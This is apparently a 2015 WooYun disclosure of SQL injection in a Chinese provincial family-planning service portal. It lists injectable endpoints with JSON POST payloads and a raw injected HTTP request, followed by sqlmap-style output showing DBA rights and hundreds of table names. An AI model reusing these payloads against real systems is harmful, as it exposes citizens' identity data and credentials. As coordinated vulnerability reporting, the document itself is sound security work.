某省人口和计划生育网上便民服务中心站点多个漏洞打包（导致大量敏感信息泄露）

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0154310

漏洞标题：某省人口和计划生育网上便民服务中心站点多个漏洞打包（导致大量敏感信息泄露）

漏洞作者： goubuli

提交时间：2015-11-20 20:30

修复时间：2016-01-11 15:34

公开时间：2016-01-11 15:34

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-11-20：细节已通知厂商并且等待厂商处理中
2015-11-24：厂商已经确认，细节仅向厂商公开
2015-12-04：细节向核心白帽子及相关领域专家公开
2015-12-14：细节向普通白帽子公开
2015-12-24：细节向实习白帽子公开
2016-01-11：细节向公众公开

简要描述：

详细说明：

河南省人口和计划生育网上便民服务中心
地址：**.**.**.**:8111/ecgapout/

注册地址：

**.**.**.**:8111/ecgapout/regedit/logintermperson.jsp

包含用户名、密码、姓名、电话、身份证号、邮箱等敏感信息泄露

漏洞地址一、

**.**.**.**:8111/ecgapout/command/ajax/common.AdministrativeDivsionQueryCommand
POST：{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"code":"410100000000"},"length":1}}

参数code可以注入

直接报出SQL了，也能明显判断是Oracle数据库，后面也证明了Oracle数据库数据量非常大
漏洞地址二、

**.**.**.**:8111/ecgapout//command/ajax/zzjshw.approval.yewu.yechuli/getcantname
POST：{"params":{"javaClass":"ParameterSet","map":{"cantid":"410100000000"},"length"

参数code可以盲注

漏洞地址三、

**.**.**.**:8111/ecgapout//command/ajax/com.ecgap.updateUsers.cmd.OutUsersQueryCommand
POST:{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"LOGINNAME@=":"testtest","start":0,"limit":10,"dir":"ASC"},"length":5}}

参数LOGINNAME@可盲注

站点应该还有其他漏洞

漏洞证明：

盲注跑的比较慢，拿第一处做证明演示
提交：

POST /ecgapout/command/ajax/common.AdministrativeDivsionQueryCommand HTTP/1.1
Host: **.**.**.**:8111
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/json; charset=UTF-8
Referer: http://**.**.**.**:8111/ecgapout/jsp/ecgap/common/administrativedivison_radio.jsp?cantCode=410000000000&cantName=%E6%B2%B3%E5%8D%97%E7%9C%81
Content-Length: 104
Cookie: JSESSIONID=F86E30FC5975577A136FC183217E3CED
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
{"params":{"javaClass":"org.loushang.next.data.ParameterSet","map":{"code":"410100000000'"},"length":1}}

放到工具跑

多种类型注入，先不管了，看数据库信息

DBA权限，22个数据库，权限比较高，可以跨库。。。

back-end DBMS: Oracle
current user:    'ECGAP_DBA'
current schema (equivalent to database on Oracle):    'ECGAP_DBA'
current user is DBA:    True
available databases [22]:
[*] CTXSYS
[*] DBSNMP
[*] DMSYS
[*] ECGAP_DBA
[*] ECGAPOUT_DBA
[*] EXFSYS
[*] HR
[*] IX
[*] MDSYS
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] SCOTT
[*] SH
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] TSMSYS
[*] WMSYS
[*] XDB

看数据库ECGAP_DBA中表【非常惊人，667张表，这里就说明了我上面说的盲注特别慢，没有贴图】：

贴出667张表：

Database: ECGAP_DBA
[667 tables]
+--------------------------------+
| ACCEPTCODESEQUENCE             |
| ACTFAREACCOUNT_ORG             |
| ACTFAREAUDITING                |
| ACTFAREAUDITINGRESON           |
| ACTFAREBANK                    |
| ACTFAREBILL                    |
| ACTFAREBILLDETAIL              |
| ACTFARED                       |
| ACTFAREDCANCELBILL             |
| ACTFAREDTYPE                   |
| ACTFAREELEPOSITON              |
| ACTFAREINSTANCE                |
| ACTFAREINSTANCE_EXT            |
| ACTFAREORG_BANK                |
| ACTFAREPROJECT                 |
| ACTFARESCOPE                   |
| ACTFARESTAND                   |
| ACTFARESTANDMAPPING            |
| ACTFARESUPPLY                  |
| ACTFAREVERIFY                  |
| ACTFARE_REFUND                 |
| ACTINSTANCEBASIC               |
| ACTINSTANCEINVOKEQUEUE         |
| ACTIVITYMODELS                 |
| ACTIVITYMODELSTEPS             |
| ACTSCHEMEBASIC                 |
| ACTSCHEMESTEP                  |
| ACTSCHEMESTEPTRANSACTOR        |
| ADDACTINSCOUNT                 |
| ADDACTINSCOUNTRESOURCES        |
| AGRICULTURE_ONECHILD           |
| AGRICULTURE_TWOCHILD           |
| APPROVAL_ITEM_DICTIONARY       |
| APPROVEITEMTACHESTUFF          |
| APPROVEITEMTACHEVIEWSTUFF      |
| ASSET                          |
| ASSET_DYNA_CURS1031            |
| ATTENDANCEPERIODS              |
| ATTENDANCEPSETS                |
| ATTENDANCEUSERINFO             |
| ATTEND_ADAPTER                 |
| ATTEND_ADAPTER_ITEM            |
| ATTEND_DICTIONARY              |
| ATTEND_FAULT                   |
| ATTEND_FORMULA_DEFINE          |
| ATTEND_FUNCTION                |
| ATTEND_FUNCTION_ITEM           |
| ATTEND_GROUP_APPLY             |
| ATTEND_GROUP_DETAIL            |
| ATTEND_GROUP_SET               |
| ATTEND_MAPPING                 |
| ATTEND_MAPPING_ITEM            |
| ATTEND_NOTCARD                 |
| ATTEND_PROGRESS                |
| ATTEND_PUBLISH                 |
| ATTEND_RECRUIT_CARD            |
| ATTEND_STAT                    |
| ATTEND_STATUS                  |
| ATTEND_USERINFO                |
| ATTEND_USER_SHIFT              |
| ATTRESINIT                     |
| BASECONSTRUCTIONENGINEERING    |
| BASECQUALITYSUPERVISOR         |
| BASECQUALITYTESTSTATION        |
| BASECSAFETYREPORTATT           |
| BASECSRHIDDENTROUBLE           |
| BASECSRMACHINEUSEPLANS         |
| BASECSRPERSONNEL               |
| BASECSRPROTECTIVEEQUIP         |
| BASECUNITQUALITYREPORT         |
| BASEENTPINVESTOR               |
| BASE_CERTIFICATE               |
| BASE_EXTENDINFO                |
| BASE_OBJECT                    |
| BASE_PERSON                    |
| BATCHAUDITING                  |
| BIZRESOURCES_BASE              |
| BIZRESOURCES_BASE_APPROVAL     |
| BIZRESOURCES_PRIVILEGE         |
| BIZRESOURCES_SORT              |
| BIZRESOURCES_STORAGE_INFO      |
| BIZRESOURCES_TYPE              |
| BIZRESOURCEVIEWRECORD          |
| BIZ_AGENT                      |
| BIZ_APPLYBASE                  |
| BIZ_ERRORLOG                   |
| BIZ_HANDLELOG                  |
| BIZ_MESSAGE                    |
| BIZ_PACKLOG                    |
| BIZ_SNAPSHOT                   |
| BIZ_STEPS                      |
| BIZ_STEPSDETAIL                |
| BLANKCERTIFICATE_INVALID       |
| BPM_TEST                       |
| BUSINESSENTITY                 |
| BUSINESSENTITY_ATT             |
| BUSINESS_STRUCTURE             |
| CARD_READER                    |
| CENSORANDEXPERTMAPPINGSORT     |
| CENSORANDEXPERTSORT            |
| CENSORANDEXPERTSORTAPPROVE     |
| CERTIFICATE_CANCELLATION       |
| CERTIFICATE_POSTINFO           |
| CERTIFICATE_RENEWAL            |
| CERTIFICATE_USER_MAPPING       |
| CERTINSTEADRELEASE             |
| CERTOUTUSERMAPPING             |
| CE_CONTENT                     |
| CE_DOCUMENTS                   |
| CE_FILES                       |
| CE_FILE_TYPE                   |
| CE_FILE_VERSION                |
| CE_STOREAREA                   |
| COMMONINFORMATION_CONTENT      |
| COMMONINFORMATION_SORT         |
| CONCORD                        |
| CONCORD_ADDTO                  |
| CONCORD_DEPT                   |
| CONCORD_PERSON                 |
| CONCORD_PROCESS                |
| CONCORD_TRIGGER                |
| COUNT_FLOW_HAVE                |
| COUNT_ZONGHE                   |
| CREDITCARDDETAIL               |
| DATAEX_APP_ITEM_CODE_MAPPING   |
| DATAEX_DEFAULTMAPPING          |
| DATAEX_DEFAULTMAPPING_FIELD    |
| DATAEX_DEFAULTMAPPING_SCHEME   |
| DATAEX_FARE_ITEM_CODE_MAPPING  |
| DATAEX_TARGET_STRU             |
| DATAEX_TARGET_STRU_DESCRIPTION |
| DEL_INSTANCE_LOG               |
| DEMO_STRU                      |
| DIC_ITEM                       |
| DIC_TYPE                       |
| DRAWCERTIFICATE                |
| DRAW_DEMO                      |
| DUSHENGZINVFMGRZBD1            |
| ECGAPTEMPCOUNT                 |
| ECGAP_SEND_MAIL_LOG            |
| EMSNOTICEFORECGAP              |
| EVALUSETTING                   |
| EXPANDPROTABLE                 |
| EXPANDSCHEMETABLE              |
| EXPANDSTEPSTENCILPURVIEW       |
| EXPANDSTEPTABLE                |
| EXPANDTACHEAUTOMATIC           |
| EXPANDTACHEAUTOMATICTEMPLETE   |
| EXPANDTYPETABLE                |
| EXPANDTYPEVALUETABLE           |
| EXPERT_ARCHIVE                 |
| EXPERT_ARCHIVE_RECORD          |
| EXPERT_ARCHIVE_SORT            |
| FACT                           |
| FAREDSTATDATASAVE              |
| FARESUSPENDWORK                |
| FEEDBACK_RECORD                |
| FEINONGERHAIBD1                |
| FEINONGYEYIHBD                 |
| FLOWAGRICULTURE_ONECHILD       |
| FLOWNOAGRICULTURE_ONECHILD     |
| FLOWPROVE_ONECHILD             |
| FLOW_HAVE                      |
| FLOW_NOHAVE                    |
| FORM                           |
| FORMINFOFOROUT                 |
| FORMMAPFIELD                   |
| FORMMAPTABLE                   |
| FORMOPINION                    |
| FORMOPINIONUSERSET             |
| FORMPRINTFILE                  |
| FORMPRINTMODAL                 |
| FORMPRINTMODALFIELD            |
| FORMPRINTMODALKEY              |
| FORMPUBLICPRINTMODAL           |
| FORMQUERYFIELD                 |
| FORMRELATION                   |
| FORM_FIELD_EXPAND              |
| FORM_MAPPING                   |
| FORM_MAPPING_ITEM              |
| FORM_RELATION                  |
| FORM_SUGGEST_DATA              |
| FORM_TABLE                     |
| FORM_TABLE_FIELD               |
| FORM_WIDGET                    |
| FORM_WIDGET_FIELD              |
| FRM_COMPONENT                  |
| FRM_COM_PROPERTY               |
| FRM_INTERFACE                  |
| FRM_METHOD                     |
| FRM_MODULE                     |
| FRM_PARAM                      |
| FRM_REFERENCE                  |
| FRM_SERVICE                    |
| HALF_END_DETAIL                |
| HALL_TRANS                     |
| HANGUPAUDITHISTORY             |
| HANGUPAUDITING                 |
| HELP_MODULES                   |
| HELP_URLS                      |
| HR_AWARD                       |
| HR_AWARD_AID                   |
| HR_AWARD_CONTROL               |
| HR_BENEFIT                     |
| HR_DIC_ITEM                    |
| HR_DIC_TYPE                    |
| HR_HALLORGANIZINFO             |
| HR_PUNISH                      |
| HR_PUNISH_AID                  |
| HR_PUNISH_ATT                  |
| HR_PUNISH_REV                  |
| HR_TRAININGCERTIFICATE         |
| HR_TRAININGMANAGEMENT          |
| HR_USER_PERSONAL_INFO          |
| HR_USER_PIC_INFO               |
| HR_USER_SOCIAL_INFO            |
| HR_USER_WORK_INFO              |
| IDEA_FEEDBACK_RECORD           |
| INSPECTOR_ARCHIVE              |
| INSPECTOR_ARCHIVE_RECORD       |
| INSPECTOR_ARCHIVE_SORT         |
| INSPECT_ITEM                   |
| IN_ADVISE                      |
| IN_ADVISEPASSON                |
| IN_ADVISE_ADDTO                |
| IN_ADVISE_BACKOUT              |
| IN_ADVISE_DEAL_OPINION         |
| IN_ADVISE_EMONITOR_MAP         |
| IN_ADVISE_HANDLE_PROCESS       |
| IN_APPROVAL_ABNORMITY_INFO     |
| IN_APPROVAL_CARD_INFO          |
| IN_APPROVAL_PREWARNNING_INFO   |
| IN_AUDITING                    |
| IN_BIZCONSIGN                  |
| IN_BUJIANREASON                |
| IN_BUJIANTABLE                 |
| IN_BUQITABLE                   |
| IN_COMPLETEWORKLIST            |
| IN_DISUSETABLE                 |
| IN_DRAFTBOX                    |
| IN_EXPORTALREQ                 |
| IN_EXPORTALREQHALL             |
| IN_EXPORTALREQLIMITSET         |
| IN_FAQ                         |
| IN_FEEDBACK                    |
| IN_FINISHNOPERMIT              |
| IN_FINISHPERMIT                |
| IN_FUJIAN                      |
| IN_INFORM                      |
| IN_INFORMATION                 |
| IN_INFORMATION_ADDTIONAL       |
| IN_INFORMATION_ATT             |
| IN_INFORMATION_ATTACHMENT      |
| IN_INFORMATION_BUSINESSTYPE    |
| IN_INFORMATION_COMMONOPINION   |
| IN_INFORMATION_CONTENT         |
| IN_INFORMATION_DECLARANT       |
| IN_INFORMATION_DOCUMENT        |
| IN_INFORMATION_EXTEND          |
| IN_INFORMATION_FIELD           |
| IN_INFORMATION_FIELDACL        |
| IN_INFORMATION_FLOW            |
| IN_INFORMATION_FLOWLINK        |
| IN_INFORMATION_FLOW_EXT        |
| IN_INFORMATION_FLOW_PRO        |
| IN_INFORMATION_HISTORY         |
| IN_INFORMATION_INSPECT_ITEM    |
| IN_INFORMATION_LIMIT           |
| IN_INFORMATION_PIC             |
| IN_INFORMATION_STENCIL         |
| IN_INFORMATION_TAB             |
| IN_INFORMATION_TABSET          |
| IN_INFORM_ATTACHMENT           |
| IN_INFORM_MAIN                 |
| IN_INFORM_PRIVILEGE            |
| IN_INFORM_RESPONSE             |
| IN_LINKURL                     |
| IN_MONITOR_INSPECTION          |
| IN_ONLINEMONITOR               |
| IN_ONLINEQUERY                 |
| IN_ONLINEQUERY_ADDTO           |
| IN_ONLINEREJECT                |
| IN_ONLINEREPLY                 |
| IN_ONLINESET                   |
| IN_ONLINETRANSPORT             |
| IN_PRINTHISTORY                |
| IN_REPARATION_STENCILREASON    |
| IN_SIGNATURE                   |
| IN_TODOWORKLIST                |
| IN_USERS                       |
| IN_VOTE                        |
| IN_VOTE_ITEM                   |
| IN_VOTE_LOG                    |
| JIANGLIFUZHUDXNSSQBD           |
| JIANGLIFUZHUDXSQBD1            |
| JIANGLIFUZHUDXTCSQBD           |
| JISHUFUWUJGBGSQBD1             |
| JISHUFUWUJGSZSQBD1             |
| JISHUFUWUJGXYSQBD1             |
| JISHUFUWUJGZYXKZSQBD1          |
| JISHUFUWURYHGZSQBD1            |
| JISHUFUWURYZYXYSQBD            |
| KUASHENGLIUDONGRKYHSYZM        |
| LAW_RULE                       |
| LAW_RULE_ATTACHMENT            |
| LC_DYNA_ATSOFMWG161737         |
| LC_DYNA_CBKDDEWP153101         |
| LC_DYNA_SQFPPWHK160602         |
| LC_DYNA_UNZVVQVR160155         |
| LC_DYNA_ZCIPVHUG154110         |
| LC_DYNA_ZCLOKXCT160131         |
| LDRKHYZMBD_WEIHUN              |
| LIUDONGRENKOUFNYHBD1           |
| LIUDONGRENKOUHYZMBD1           |
| LIUDONGRENKOUNYYHBD1           |
| MESSAGEBIZDATA                 |
| MESSAGECHANNAL                 |
| MESSAGEQUEUE                   |
| MESSAGETYPE                    |
| MESSAGETYPEFACTOR              |
| MESSAGE_CONSTRUCTION           |
| MSGSENDLOG                     |
| MSGTEMPLETRELATING             |
| MSGTYPECHANNAL                 |
| MSGTYPETEMPCOL                 |
| MSGTYPETEMPLETE                |
| NAVIGATIONDETAIL               |
| NOAGRICULTURE_ONECHILD         |
| NOAGRICULTURE_TWOCHILD         |
| NONGYEERHAIBD                  |
| NONGYEYIHAIBD1                 |
| NOTIMPARTACCEPT                |
| NUM_FLOW                       |
| NUM_HAODUAN                    |
| NUM_INDEX                      |
| NUM_MANAGEMENT                 |
| NUM_NUMBER                     |
| NUM_ONLY                       |
| NUM_PEOPLE_PLAN                |
| NUM_PLAN_APPROVAL              |
| NUM_RECORD                     |
| NUM_STATISTICS                 |
| NUM_TECH_PEOPLE                |
| ONLYCHILDREN_CERTIFICATE       |
| OVERTIMEACQUIESCE              |
| OVERTIMEACQUIESCESET           |
| OVERTIMEACQUIESCETACHE         |
| PEOPLE_IDEA                    |
| PM_ADJUNCTINFO                 |
| PM_BASEINFO                    |
| PM_BIDFILEINFO                 |
| PM_BIDFILE_GRADEITEM           |
| PM_BIDFILE_ITEMS               |
| PM_BIDFILE_SALE                |
| PM_BIDORG_CERTIFICATE          |
| PM_BIDORG_ENROLINFO            |
| PM_BID_BASEINFO                |
| PM_BID_BULLETIN                |
| PM_BID_EVALUATIONINFO          |
| PM_BID_MARKINFO                |
| PM_BID_MARKRESULT              |
| PM_BID_QUERYINFO               |
| PM_BID_RESULTINFO              |
| PM_CHECKMANAGE                 |
| PM_CONSTRUCTION                |
| PM_CONTRACT_BASEINFO           |
| PM_DICTIONARY                  |
| PM_EXPENSE_APP_AOUDIT          |
| PM_EXPENSE_APP_DETAIL          |
| PM_EXPENSE_SORT                |
| PM_GUAGEINFO                   |
| PM_INVESTINFO                  |
| PM_INVEST_PLAN                 |
| PM_INVEST_PLAN_AOUDIT          |
| PM_INVEST_PLAN_AUDIT           |
| PM_INVEST_ROPRIATION           |
| PM_PRODUCTCAPACITY             |
| PM_PROJECTTYPE_SET             |
| PM_PROJECT_STEP                |
| PM_PROJECT_STEP_APPLICATION    |
| PM_PROJECT_STEP_APPROVALINST   |
| PM_PROJECT_STEP_APPROVALITEM   |
| PM_PROJECT_STEP_INSTANCE       |
| PM_RIMOWA_AOUDIT               |
| PM_RIMOWA_ATT                  |
| PM_SATISFACTION_RESEARCH       |
| PM_SATISFACTION_RESEARCH_DETAI |
| PM_SATISFACTION_RESEARCH_SORT  |
| PM_SCHEDDULE_ATT               |
| PM_SCHEDULE_PLAN               |
| PM_SCHEDULE_PLAN_AUDIT         |
| PM_SCHEDULE_SUMMARY            |
| PM_SOILBUILDINFO               |
| PM_SOILINFO                    |
| PM_SOILPACTINFO                |
| PM_STAGE_COMPLETEWORKLIST      |
| PM_STAGE_FINISHWORKLIST        |
| PM_STAGE_INSTANCEINFO          |
| PM_STAGE_SHARESTAFF_INFO       |
| PM_STAGE_TODOWORKLIST          |
| PM_STAGE_TRANSACTOR            |
| PM_STEPTROUBLE                 |
| PM_SUPERIOR_RIMOWA             |
| PM_TENDERSECTION               |
| PM_WORKAMOUNT_CALCULATE        |
| PM_YEARINVEST                  |
| PORTAL_CATEGORY                |
| PORTAL_COLUMN                  |
| PORTAL_LAYOUT                  |
| PORTAL_PAGE                    |
| PORTAL_TEMPLATE                |
| PORTAL_TEMPLATE_PERMIT         |
| PORTAL_USER_LAYOUT             |
| PORTAL_WIDGET                  |
| PRAISING                       |
| PRAISING_ADDTO                 |
| PRAISING_ATTS                  |
| PRAISING_PERSON                |
| PREREVIEWOVERTIMEACQUIESCE     |
| PREREVIEWOVERTIMEACQUIESCESET  |
| PRESENT_LEAVE                  |
| PRESENT_LEAVE_ACTIVITY         |
| PRESENT_LEAVE_FLOW             |
| PRESENT_LEAVE_SCHEME           |
| PRESENT_LEAVE_TRANSACTOR       |
| PRINTFORM_SET                  |
| PRINTING_CHANGE                |
| PRINTMARGINSETUP               |
| PUBLIC_SHOWS                   |
| PUBLIC_TIME                    |
| PUB_APPS                       |
| PUB_CANT                       |
| PUB_CANT_SYN                   |
| PUB_CANT_TYPE                  |
| PUB_COLLECTMENU                |
| PUB_CONF_ROLES                 |
| PUB_CONF_ROLESET               |
| PUB_COUNTRY                    |
| PUB_DATA_TYPE                  |
| PUB_DICT                       |
| PUB_DICT_ITEM                  |
| PUB_FUNCTIONS                  |
| PUB_GLOBAL_POLICY              |
| PUB_IDTABLE                    |
| PUB_LDAP_SYN_USERS             |
| PUB_MENU_ITEM                  |
| PUB_MENU_STRU                  |
| PUB_MENU_TYPE                  |
| PUB_MODULES                    |
| PUB_ONLINE                     |
| PUB_OPERATIONS                 |
| PUB_OPERATION_TYPE             |
| PUB_ORGAN                      |
| PUB_ORGAN_EXT                  |
| PUB_ORGAN_PARMS                |
| PUB_ORGAN_PARMS_TYPE           |
| PUB_ORGAN_TYPE                 |
| PUB_ORGAN_WORKDAY              |
| PUB_PROXY_PERMISSION           |
| PUB_PROXY_PERMISSION_ITEM      |
| PUB_ROLES                      |
| PUB_ROLE_GROUP                 |
| PUB_ROLE_GROUP_SCOPE           |
| PUB_ROLE_OPERATION             |
| PUB_ROLE_PRIVS                 |
| PUB_STRU                       |
| PUB_STRU_EXT                   |
| PUB_STRU_RULE                  |
| PUB_STRU_TYPE                  |
| PUB_URLS                       |
| PUB_USERS                      |
| PUB_USER_DATA_PERMIT           |
| PUB_USER_EMPLOYEE              |
| PUB_USER_MAP                   |
| PUB_USER_POLICY                |
| PUB_USER_PROXY                 |
| PUB_USER_ROLE                  |
| PUB_USER_TYPE                  |
| PUB_WORKPLACE                  |
| QUEUE_COMPLETELIST             |
| QUEUE_TODOLIST                 |
| REJECTTIME                     |
| RETURNMESSAGE                  |
| REWARDAIDS_APPLICATION         |
| REWARDAIDS_EXIT                |
| REWARDAIDS_YEARCAREFUL         |
| SENATEDETAILTABLE              |
| SENATETABLE                    |
| SENDBACK                       |
| SEND_MESSAGE                   |
| SPECIALASSISTANCE_APPLICATION  |
| SPECIALASSISTANCE_EXIT         |
| SPECIALASSISTANCE_YEARCAREFUL  |
| SR_NOTSTATORGLIST              |
| STAT_MODE                      |
| SUPERVISIONNOTICE              |
| SYS_ACCEPTCODE                 |
| SYS_FORMULARY                  |
| SYS_INDICATOR                  |
| SYS_KEYGENERATOR               |
| SYS_ORGAN_EXTEND               |
| SYS_PURVIEW                    |
| SYS_PURVIEWGROUP               |
| SYS_PURVIEW_MAPPING            |
| SYS_RECEIVECODE                |
| SYS_USER_EXTEND                |
| SYS_WORKTIMESET                |
| TAKE_BACK                      |
| TASKALLOT                      |
| TEBIEFUZHUDXNSSQB              |
| TEBIEFUZHUDXSQB                |
| TEBIEFUZHUDXTCSQBD             |
| TECHNICALORGANIZATIONS_APP     |
| TECHNICALORGANIZATIONS_CAL     |
| TECHNICALORGANIZATIONS_CHANGE  |
| TECHNICALORGANIZATIONS_SET     |
| TECHNICALPEOPLE_APP            |
| TECHNICALPEOPLE_CAL            |
| TREETABLE                      |
| T_ECGAP_JZUSERS                |
| T_ECGAP_JZUSER_EXP             |
| T_ECGAP_USER                   |
| T_ECGAP_USER_EXP               |
| USER_ACCOUNT                   |
| USER_TEMP                      |
| WEBQQ                          |
| WF_ACTIVITY                    |
| WF_ACTIVITY_DEF                |
| WF_ACTIVITY_DEF_OPERATION_REF  |
| WF_ACTIVITY_END                |
| WF_ACTIVITY_EXTERNAL_DEF_ECGAP |
| WF_ACTIVITY_LIMIT              |
| WF_ACTIVITY_LIMIT_DEF          |
| WF_ACTIVITY_RESUME_EVENT       |
| WF_ACTIVITY_RESUME_EVENT_END   |
| WF_ACTIVITY_SUSPEND_EVENT      |
| WF_ACTIVITY_SUSPEND_EVENT_END  |
| WF_ACTIVITY_WARN               |
| WF_ACTIVITY_WARN_DEF           |
| WF_ACT_DEF_ADJUNCT_RIGHT       |
| WF_ACT_DEF_DOC_RIGHT           |
| WF_ACT_DEF_ECGAP_ACTION        |
| WF_ACT_DEF_ECGAP_ACTION_DEPEND |
| WF_ACT_DEF_ECGAP_ACTION_END    |
| WF_ACT_DEF_ECGAP_ACTION_YIBAN  |
| WF_ACT_DEF_ECGAP_FORM          |
| WF_ACT_DEF_ECGAP_FORM_ACL      |
| WF_ACT_DEF_GRAPH               |
| WF_ACT_DEF_JSP_BUTTON          |
| WF_ACT_DEF_JSP_FIELD           |
| WF_ACT_DEF_JSP_FORM            |
| WF_ACT_DEF_PT_ECGAP            |
| WF_ACT_DEF_SOURCE_URL_REF      |
| WF_ACT_DEF_SUGGEST_ECGAP       |
| WF_ACT_EXT_ATTR_DEF            |
| WF_ACT_OPERATION_INVOC_DEF     |
| WF_ACT_OUT_MESSAGE_VALUE_DEF   |
| WF_ACT_PART_REF_DEF            |
| WF_ACT_PK_DATA_FIELD_DEF       |
| WF_ACT_SET_DEF                 |
| WF_ACT_SET_EXT_ATTR_DEF        |
| WF_ACT_SET_LIMIT               |
| WF_ACT_SET_LIMIT_DEF           |
| WF_ACT_SET_REF_DEF             |
| WF_ACT_SET_WARN                |
| WF_ACT_SET_WARN_DEF            |
| WF_ACT_SET_WARN_MSG_DEF        |
| WF_ACT_SUBJECT_DATA_FIELD_DEF  |
| WF_ACT_WARN_MSG_DEF            |
| WF_ASSIGNMENT                  |
| WF_ASSIGNMENT_END              |
| WF_ASSIGN_NEXT                 |
| WF_ASSIGN_PRE                  |
| WF_ASSIGN_RULE_IN_TURN_DEF     |
| WF_ASSIGN_RULE_TYPE_DEF        |
| WF_BINDING_DEF                 |
| WF_BUSINESS_DEF_SERVICE_REF    |
| WF_COMPLEX_DATA_TYPE_DEF       |
| WF_DAI_BAN_TASK                |
| WF_DATA_FIELD                  |
| WF_DATA_FIELD_DEF              |
| WF_DATA_FIELD_END              |
| WF_DATA_FIELD_MAPPING_DEF      |
| WF_DEFAULT_SUBJECT_DEF         |
| WF_DEFAULT_SUBJECT_QUERY_DEF   |
| WF_ECGAP_FORM_ACTION_DEF       |
| WF_ELEMENT_DEF                 |
| WF_END_DEF_GRAPH               |
| WF_END_TASK                    |
| WF_FORM_ACTION_GROUP_DEF       |
| WF_FORM_ACTION_LOG             |
| WF_FREEDOM_PROCESS_END         |
| WF_JSP_FORM_ACTION_DEF         |
| WF_JSP_FORM_DEF                |
| WF_JSP_FORM_FIELD_DEF          |
| WF_JSP_FORM_REQUEST_URL_DEF    |
| WF_MESSAGE_DEF                 |
| WF_OPERATION_DEF               |
| WF_PARTICIPANT_DEF             |
| WF_PORT_DEF                    |
| WF_PORT_TYPE_DEF               |
| WF_PROCESS                     |
| WF_PROCESS_DEF                 |
| WF_PROCESS_DEF_MODELING        |
| WF_PROCESS_DEF_SERVICE_REF     |
| WF_PROCESS_END                 |
| WF_PROCESS_LIMIT               |
| WF_PROCESS_LIMIT_DEF           |
| WF_PROCESS_MERGE               |
| WF_PROCESS_MONITOR             |
| WF_PROCESS_MONITOR_DEF         |
| WF_PROCESS_RESUME_EVENT        |
| WF_PROCESS_RESUME_EVENT_END    |
| WF_PROCESS_SUSPEND_EVENT       |
| WF_PROCESS_SUSPEND_EVENT_END   |
| WF_PROCESS_TYPE                |
| WF_PROCESS_WARN                |
| WF_PROCESS_WARN_DEF            |
| WF_PROC_CREATE_MANUAL_DATA_REF |
| WF_PROC_DEF_HAS_DOC            |
| WF_PROC_DEF_MODELING_DATA_REF  |
| WF_PROC_DEF_PAGE_BUTTON_DEF    |
| WF_PROC_DEF_SOURCE_REF         |
| WF_PROC_DEF_SOURCE_SUBJECT_REF |
| WF_PROC_EXT_ATTR_DEF           |
| WF_PROC_SUBJECT                |
| WF_PROC_SUBJECT_COLUMN_DEF     |
| WF_PROC_SUBJECT_DEF            |
| WF_PROC_SUBJECT_QUERY_DEF      |
| WF_PROC_SUBJECT_SC_FIELD_DEF   |
| WF_PROC_SUBJECT_SC_TYPE_DEF    |
| WF_PROC_SUBJECT_TABLE_DEF      |
| WF_PROC_SUBJ_QUERY_HELP_DEF    |
| WF_PROC_SUBJ_QUERY_SELECT_DEF  |
| WF_PROC_SYS_SUBJECT            |
| WF_PROC_WARN_MSG_DEF           |
| WF_PROPERTY_CONFIG             |
| WF_SERVICE_CALL_EXCEPTION      |
| WF_SERVICE_DEF                 |
| WF_START_DEF_GRAPH             |
| WF_SYS_SUBJECT_DEF             |
| WF_SYS_SUBJECT_QUERY_DEF       |
| WF_SYS_SUBJECT_SC_DEF          |
| WF_SYS_SUBJECT_SC_FIELD_DEF    |
| WF_SYS_SUBJ_QUERY_HELP_DEF     |
| WF_SYS_SUBJ_QUERY_SELECT_DEF   |
| WF_TRANSITION                  |
| WF_TRANSITION_BACK             |
| WF_TRANSITION_BACK_END         |
| WF_TRANSITION_DEF              |
| WF_TRANSITION_END              |
| WF_TRIP_PROXY_ASSIGNMENT       |
| WF_TRIP_PROXY_OPERATION_DEF    |
| WF_TRIP_PROXY_PROC_DEF         |
| WF_TYPE_SUBJECT_COLUMN_DEF     |
| WF_TYPE_SUBJECT_DEF            |
| WF_TYPE_SUBJECT_QUERY_DEF      |
| WF_TYPE_SUBJECT_SC_FIELD_DEF   |
| WF_TYPE_SUBJECT_SC_TYPE_DEF    |
| WF_TYPE_SUBJECT_TABLE_DEF      |
| WF_TYPE_SUBJ_QUERY_HELP_DEF    |
| WF_TYPE_SUBJ_QUERY_SELECT_DEF  |
| WF_TYPE_TASK_LIST_PAGE_BTN_DEF |
| WF_YI_BAN_TASK                 |
| WOMEN_TOTAL                    |
| WORKFLOW_CERTIFICATE           |
| YUSHEN20140630                 |
+--------------------------------+

不过这个洞支持union和Error，所以还是比较快的，建议审核在复现时，采用同样的方式
数据量

数千万的数据量，找了找跟用户相关的表

WF_ASSIGNMENT_END
PUB_USER_ROLE
PUB_USER_POLICY
PUB_USERS
...

=================================================================
附送一个跨库的信息

Database: ECGAPOUT_DBA
[92 tables]
+--------------------------------+
| ACCOUNTACTIVATION              |
| DUSHENGZINVFMGRZBD1            |
| FEINONGERHAIBD1                |
| FEINONGYEYIHBD                 |
| FORM                           |
| FORMINFOFOROUT                 |
| FORMMAPFIELD                   |
| FORMMAPTABLE                   |
| FORMQUERYFIELD                 |
| FORM_FIELD_EXPAND              |
| FORM_TABLE                     |
| FORM_TABLE_FIELD               |
| FORM_WIDGET                    |
| FORM_WIDGET_FIELD              |
| HAND_REPORT_APPROVEITEM_DETAIL |
| HAND_REPORT_APPROVE_ITEM       |
| HAND_REPORT_CONSTRUCTION       |
| HAND_REPORT_DEPT               |
| HAND_REPORT_DEPT_DETAIL        |
| HAND_REPORT_ENTERPRISE         |
| HAND_REPORT_ITEM_TYPE          |
